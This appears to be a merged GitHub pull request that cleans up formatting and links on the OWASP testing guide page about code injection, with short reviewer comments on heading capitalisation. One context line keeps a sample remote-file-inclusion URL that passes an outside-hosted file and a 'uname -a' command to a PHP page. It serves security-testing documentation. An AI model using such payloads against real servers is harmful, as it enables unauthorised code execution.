### PR TITLE
OTG-4.8.12 - v4 migration cleanup

### PR DESCRIPTION
**Pull request by rejahrehim**
This PR part of  issue #84 .

- [ ] This PR handles the issue and requires no additional PRs.
- [x] You have validated the need for this change.

**What did this PR accomplish?**

- Fix links
- Fix linting

### CODE REVIEW

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md [hunk 1]
```diff
@@ -1,12 +1,12 @@
...
 This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server.
 
-In [Code Injection](Code_Injection "wikilink") testing, a tester submits input that is processed by the web server as dynamic code or as an included file. These tests can target various server-side scripting engines, e.g.., ASP or PHP. Proper input validation and secure coding practices need to be employed to protect against these attacks.
+In [Code Injection](https://www.owasp.org/index.php/Code_Injection) testing, a tester submits input that is processed by the web server as dynamic code or as an included file. These tests can target various server-side scripting engines, e.g.., ASP or PHP. Proper input validation and secure coding practices need to be employed to protect against these attacks.
 
-How to Test
------------
+## How to Test
 
 ### Black Box testing
```
Comment (kingthorin) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md]: Title caps pls

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md [hunk 2]
```diff
@@ -16,57 +16,44 @@ Using the querystring, the tester can inject code (in this example, a malicious
 
 `http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a`
 
-**Result Expected:**
-
-The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.
+> The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.
 
 ### Gray Box testing
```
Comment (kingthorin) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md]: Title caps pls

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md [hunk 3]
```diff
@@ -16,57 +16,44 @@ Using the querystring, the tester can inject code (in this example, a malicious
...
 
 #### Testing for ASP Code Injection vulnerabilities
```
Comment (kingthorin) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md]: Title caps pls

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md (hunk 1 above)
Comment (rejahrehim) [reply document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.12_Testing_for_Code_Injection_OTG-INPVAL-012.md]: @kingthorin  Fixed

**Pull request merged**